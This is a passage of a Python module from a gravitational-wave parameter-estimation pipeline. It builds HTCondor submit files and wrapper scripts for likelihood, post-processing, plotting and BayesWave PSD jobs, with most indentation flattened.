singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
if 'SINGULARITY_BASE_EXE_DIR' in list(os.environ.keys()) :
singularity_base_exe_path = os.environ['SINGULARITY_BASE_EXE_DIR']
else:
# singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
singularity_base_exe_path = "/usr/bin/" # should not hardcode this ...!
exe=singularity_base_exe_path + path_split[-1]
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
elif use_osg: # NOT using singularity!
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
path_split = exe.split("/")
exe=path_split[-1] # pull out basename
exe_here = 'my_wrapper.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ['../my_wrapper.sh']
with open(exe_here,'w') as f:
f.write("#! /bin/bash \n")
f.write(r"""
#!/bin/bash
# Modules and scripts run directly from repository
# Note the repo and branch are self-referential ! Not a robust solution long-term
# Exit on failure:
# set -e
export INSTALL_DIR=research-projects-RIT
export ILE_DIR=${INSTALL_DIR}/MonteCarloMarginalizeCode/Code
export PATH=${PATH}:${ILE_DIR}
export PYTHONPATH=${PYTHONPATH}:${ILE_DIR}
export GW_SURROGATE=gwsurrogate
git clone https://git.ligo.org/richard-oshaughnessy/research-projects-RIT.git
pushd ${INSTALL_DIR}
git checkout temp-RIT-Tides-port_master-GPUIntegration
popd
ls
cat local.cache
echo Starting ...
./research-projects-RIT/MonteCarloMarginalizeCode/Code/""" + exe + " $@ \n")
os.system("chmod a+x "+exe_here)
exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
if simple_unique:
uniq_str = "$(macroevent)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
if cache_file:
ile_job.add_opt("cache-file",cache_file)
ile_job.add_var_opt("event")
if not use_osg:
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
if not(request_disk is False):
ile_job.add_condor_cmd('request_disk', str(request_disk))
nGPUs =0
if request_gpu:
nGPUs=1
ile_job.add_condor_cmd('request_GPUs', str(nGPUs))
if use_singularity:
# Compare to https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('request_CPUs', str(1))
ile_job.add_condor_cmd('transfer_executable', 'False')
ile_job.add_condor_cmd("+SingularityBindCVMFS", 'True')
ile_job.add_condor_cmd("+SingularityImage", '"' + singularity_image + '"')
requirements = []
requirements.append("HAS_SINGULARITY=?=TRUE")
# if not(use_simple_osg_requirements):
# requirements.append("HAS_CVMFS_LIGO_CONTAINERS=?=TRUE")
#ile_job.add_condor_cmd("requirements", ' (IS_GLIDEIN=?=True) && (HAS_LIGO_FRAMES=?=True) && (HAS_SINGULARITY=?=TRUE) && (HAS_CVMFS_LIGO_CONTAINERS=?=TRUE)')
if use_cvmfs_frames:
requirements.append("HAS_LIGO_FRAMES=?=TRUE")
ile_job.add_condor_cmd('use_x509userproxy','True')
if 'X509_USER_PROXY' in list(os.environ.keys()):
print(" Storing copy of X509 user proxy -- beware expiration! ")
cwd = os.getcwd()
fname_proxy = cwd +"/my_proxy" # this can get overwritten, that's fine - just renews, feature not bug
os.system("cp ${X509_USER_PROXY} " + fname_proxy)
# ile_job.add_condor_cmd('x509userproxy',os.environ['X509_USER_PROXY'])
ile_job.add_condor_cmd('x509userproxy',fname_proxy)
if use_osg:
if not(use_simple_osg_requirements):
requirements.append("IS_GLIDEIN=?=TRUE")
# avoid black-holing jobs to specific machines that consistently fail. Uses history attribute for ad
ile_job.add_condor_cmd('periodic_release','(HoldReasonCode == 45) && (HoldReasonSubCode == 0)')
ile_job.add_condor_cmd('job_machine_attrs','Machine')
ile_job.add_condor_cmd('job_machine_attrs_history_length','4')
# for indx in [1,2,3,4]:
# requirements.append("TARGET.GLIDEIN_ResourceName=!=MY.MachineAttrGLIDEIN_ResourceName{}".format(indx))
if "OSG_DESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+DESIRED_SITES',os.environ["OSG_DESIRED_SITES"])
if "OSG_UNDESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+UNDESIRED_SITES',os.environ["OSG_UNDESIRED_SITES"])
# Some options to automate restarts, acts on top of RETRY in dag
if fragile_hold:
ile_job.add_condor_cmd("periodic_release","(NumJobStarts < 5) && ((CurrentTime - EnteredCurrentStatus) > 600)")
ile_job.add_condor_cmd("on_exit_hold","(ExitBySignal == True) || (ExitCode != 0)")
if use_singularity or use_osg:
# Set up file transfer options
ile_job.add_condor_cmd("when_to_transfer_output",'ON_EXIT')
# Stream log info
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
# Create prescript command to set up local.cache, only if frames are needed
# if we have CVMFS frames, we should be copying local.cache over directly, with it already populated !
if not(frames_local is None) and not(use_cvmfs_frames): # should be required for singularity or osg
try:
lalapps_path2cache=os.environ['LALAPPS_PATH2CACHE']
except KeyError:
print("Variable LALAPPS_PATH2CACHE is unset, assume default lalapps_path2cache is appropriate")
lalapps_path2cache="lalapps_path2cache"
cmdname = 'ile_pre.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ["../ile_pre.sh", frames_dir] # assuming default working directory setup
with open(cmdname,'w') as f:
f.write("#! /bin/bash -xe \n")
f.write( "ls "+frames_local+" | {lalapps_path2cache} 1> local.cache \n".format(lalapps_path2cache=lalapps_path2cache)) # Danger: need user to correctly specify local.cache directory
# Rewrite cache file to use relative paths, not a file:// operation
f.write(" cat local.cache | awk '{print $1, $2, $3, $4}' > local_stripped.cache \n")
f.write("for i in `ls " + frames_local + "`; do echo "+ frames_local + "/$i; done > base_paths.dat \n")
f.write("paste local_stripped.cache base_paths.dat > local_relative.cache \n")
f.write("cp local_relative.cache local.cache \n")
os.system("chmod a+x ile_pre.sh")
ile_job.add_condor_cmd('+PreCmd', '"ile_pre.sh"')
# if use_osg:
# ile_job.add_condor_cmd("+OpenScienceGrid",'True')
if use_cvmfs_frames:
transfer_files += ["../local.cache"]
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
if not transfer_files is None:
if not isinstance(transfer_files, list):
fname_str=transfer_files
else:
fname_str = ','.join(transfer_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_input_files', fname_str)
ile_job.add_condor_cmd('should_transfer_files','YES')
if not transfer_output_files is None:
if not isinstance(transfer_output_files, list):
fname_str=transfer_output_files
else:
fname_str = ','.join(transfer_output_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_output_files', fname_str)
# Periodic remove: kill jobs running longer than max runtime
# https://stackoverflow.com/questions/5900400/maximum-run-time-in-condor
if not(max_runtime_minutes is None):
remove_str = 'JobStatus =?= 2 && (CurrentTime - JobStartDate) > ( {})'.format(60*max_runtime_minutes)
ile_job.add_condor_cmd('periodic_remove', remove_str)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each time.
if condor_commands is not None:
        for cmd, value in condor_commands.items():
ile_job.add_condor_cmd(cmd, value)
return ile_job, ile_sub_name
def write_consolidate_sub_simple(tag='consolidate', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_ILEdagPostprocess.sh")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
ile_job.add_arg(base) # what directory to load
ile_job.add_arg(target) # where to put the output (label), in CWD
#
# NO OPTIONS
#
# arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
# arg_str = arg_str.lstrip('-')
# ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each time.
return ile_job, ile_sub_name
def write_unify_sub_simple(tag='unify', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
    Write a submit file for launching a unification job
        util_CleanILE.py  # concatenates *.composite files, dropping duplicates and stripping large-error samples
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_CleanILE.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# Write unify.sh
# - problem of globbing inside condor commands
# - problem that *.composite files from intermediate results will generally NOT be present
cmdname ='unify.sh'
base_str = ''
if not (base is None):
base_str = ' ' + base +"/"
with open(cmdname,'w') as f:
f.write("#! /usr/bin/env bash\n")
f.write( "ls " + base_str+"*.composite 1>&2 \n") # write filenames being concatenated to stderr
f.write( exe + base_str+ "*.composite \n")
st = os.stat(cmdname)
import stat
os.chmod(cmdname, st.st_mode | stat.S_IEXEC)
ile_job = pipeline.CondorDAGJob(universe=universe, executable=base_str+cmdname) # force full prefix
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
# ile_job.add_arg('*.composite') # what to do
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convert_sub(tag='convert', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'convert' job
convert_output_format_ile2inference
"""
exe = exe or which("convert_output_format_ile2inference") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_arg(file_input)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_test_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,universe="target",arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a convergence test job
"""
exe = exe or which("convergence_test_samples.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("samples " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_plot_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a final plot. Note the user can in principle specify several samples (e.g., several iterations, if we want to diagnose them)
"""
exe = exe or which("plot_posterior_corner.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("posterior-file " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_init_sub(tag='gridinit', exe=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a grid initialization job.
Note this routine MUST create whatever files are needed by the ILE iteration
"""
exe = exe or which("util_ManualOverlapGrid.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_monoblock(tag='PSD_BW_mono', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,universe='local',no_grid=False,**kwargs):
"""
Write a submit file for constructing the PSD using BW
Modern argument syntax for BW
Note that *all ifo-specific results must be set outside this loop*, to work sensibly, and passed as an argument
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BW
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Loop over IFOs
# You should only have one, in the workflow for which this is intended
# Problem:
ile_job.add_arg("$(macroargument0)")
#
# Add mandatory options
ile_job.add_opt('Niter', '1000100')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Dmax', '200') # limit number of dimensions in model
ile_job.add_opt('resume', '')
ile_job.add_opt('progress', '')
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('psdlength', str(psd_length))
ile_job.add_opt('srate', str(srate))
ile_job.add_opt('outputDir', 'output_$(ifo)')
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
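# ---------------------------------------------------------------------------
# Illustrative usage sketch (not exercised anywhere in this module): wiring the
# monoblock BW PSD job into a DAG, one node per IFO.  The DAG/file names, GPS
# time and the per-IFO argument strings below are hypothetical placeholders,
# not values required by the pipeline.
# ---------------------------------------------------------------------------
def _example_psd_bw_monoblock_dag(log_dir="logs/"):
    """Minimal sketch, assuming glue.pipeline macro semantics for DAG nodes."""
    dag = pipeline.CondorDAG(log_dir + "psd_mono.dag.log")
    dag.set_dag_file("psd_mono")
    psd_job, _ = write_psd_sub_BW_monoblock(tag='PSD_BW_mono', log_dir=log_dir,
                                            event_time=1126259462.4, psd_length=4, srate=4096)
    per_ifo_args = {
        "H1": "--ifo H1 --H1-channel H1:GDS-CALIB_STRAIN --H1-cache local.cache --H1-flow 20",
        "L1": "--ifo L1 --L1-channel L1:GDS-CALIB_STRAIN --L1-cache local.cache --L1-flow 20",
    }
    for ifo, ifo_args in per_ifo_args.items():
        node = pipeline.CondorDAGNode(psd_job)
        node.add_macro("macroevent", 0)             # only used to label the log files
        node.add_macro("macroargument0", ifo_args)  # consumed via $(macroargument0) above
        node.add_macro("ifo", ifo)                  # consumed via --outputDir output_$(ifo)
        dag.add_node(node)
    dag.write_sub_files()
    dag.write_dag()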
def write_psd_sub_BW_step1(tag='PSD_BW_post', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for the BayesWavePost stage of PSD estimation.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BayesWavePost
"""
exe = exe or which("BayesWavePost")
if exe is None:
print(" BayesWavePost not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
# Not needed, can do one job per PSD
# ile_job.add_opt("ifo","$(ifo)")
# ile_job.add_opt("$(ifo)-cache",cache_file)
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo "+ ifo) # need to prevent overwriting!
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
